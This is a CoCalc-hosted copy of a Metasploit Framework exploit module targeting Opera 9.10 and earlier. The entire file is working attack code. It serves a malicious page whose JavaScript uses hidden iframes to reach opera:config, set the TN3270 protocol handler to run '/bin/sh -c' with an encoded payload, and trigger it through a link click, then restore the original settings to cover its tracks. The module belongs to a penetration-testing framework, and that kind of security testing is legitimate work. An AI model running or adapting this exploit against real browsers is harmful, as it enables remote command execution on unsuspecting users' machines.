CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/opera_configoverwrite.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  include Msf::Exploit::Remote::BrowserAutopwn

15
  autopwn_info({

16
    :ua_name => HttpClients::OPERA,

17
    :ua_maxver => "9.10",

18
    :os_name => [ OperatingSystems::Match::WINDOWS, OperatingSystems::Match::LINUX ],

19
    :javascript => true,

20
    :rank => ExcellentRanking, # reliable cmd exec, cleans up after itself

21
    :vuln_test => nil,

22
  })

23


24
  def initialize(info = {})

25
    super(update_info(info,{

26
      'Name'           => 'Opera 9 Configuration Overwrite',

27
      'Description'    => %q{

28
        Opera web browser in versions <= 9.10 allows unrestricted script

29
        access to its configuration page, opera:config, allowing an

30
        attacker to change settings and potentially execute arbitrary

31
        code.

32
      },

33
      'License'        => BSD_LICENSE,

34
      'Author'         =>

35
        [

36
          'egypt', # stolen from mpack

37
        ],

38
      'References'     =>

39
        [

40
          [ 'OSVDB', '66472'],

41
        ],

42
      'Payload'        =>

43
        {

44
          'EXITFUNC' => 'process',

45
          'Space'    => 2048,

46
          'DisableNops' => true,

47
          'BadChars' => " ",

48
        },

49
      'Platform'       => %w{ unix },

50
      'Targets'        =>

51
        [

52
          #[ 'Opera < 9.10 Windows',

53
          #	{

54
          #		'Platform' => 'win',

55
          #		'Arch' => ARCH_X86,

56
          #	}

57
          #],

58
          [ 'Opera < 9.10 Unix Cmd',

59
            {

60
              'Platform' => 'unix',

61
              'Arch' => ARCH_CMD,

62
            }

63
          ],

64
        ],

65
      # Not sure when this was disclosed but it's been known since at

66
      # least March 5, 2007, since that's the release date on the version

67
      # of mpack I stole this from.

68
      'DisclosureDate' => '2007-03-05',

69
      'DefaultTarget' => 0

70
      }))

71
  end

72


73
  def on_request_uri(cli, request)

74
    print_status("Got request #{request.uri}")

75


76
    case request.uri

77
    when get_resource

78
      print_status("Sending #{self.name}")

79
      content =  "<body><script>"

80
      content << generate_evil_js(cli, request)

81
      content << "</script></body>"

82
      headers = { 'Content-Type' => 'text/html' }

83
    else

84
      print_status("404ing request for #{request.uri}")

85
      send_not_found(cli)

86
      return

87
    end

88
    send_response_html(cli, content, headers)

89


90
    print_status("Done with request #{request.uri}")

91
  end

92


93
  def generate_evil_js(cli, request)

94
    # There are a bunch of levels of quotes here, so the easiest way to

95
    # make everything line up is to hex escape the command to run

96
    p = regenerate_payload(cli).encoded

97
    send_not_found(cli) && return if not p

98


99
    shellcode = Rex::Text.to_hex(p, "%")

100
    js = <<ENDJS

101
blank_iframe = document.createElement('iframe');

102
blank_iframe.src = 'about:blank';

103
blank_iframe.setAttribute('id', 'blank_iframe_window');

104
blank_iframe.setAttribute('style', 'display:none');

105
document.body.appendChild(blank_iframe);

106
blank_iframe_window.eval(

107
  "config_iframe = document.createElement('iframe');" +

108
  "config_iframe.setAttribute('id', 'config_iframe_window');" +

109
  "config_iframe.src = 'opera:config';" +

110
  "document.body.appendChild(config_iframe);" +

111
  "cache_iframe = document.createElement('iframe');" +

112
  "cache_iframe.src = 'opera:cache';" +

113
  "cache_iframe.onload = function ()" +

114
  "{" +

115
  "	config_iframe_window.eval" +

116
  "	(\\"" +

117
  "	old_handler = opera.getPreference('Network','TN3270 App');" +

118
  "	old_pref    = opera.getPreference('User Prefs','Run TN3270 In Terminal');" +

119
  "	shellcode = '#{shellcode}';" +

120
  "	opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +

121
  "	opera.setPreference('User Prefs','Run TN3270 In Terminal','0');" +

122
  "	app_link = document.createElement('a');" +

123
  "	app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +

124
  "	app_link.click();" +

125
  "	setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +

126
  "	setTimeout(function () {opera.setPreference('User Prefs','Run TN3270 In Terminal',old_pref)},1000);" +

127
  "	\\");" +

128
  "};" +

129
  "document.body.appendChild(cache_iframe);" +

130
"");

131
ENDJS

132


133
  end

134
end

135


136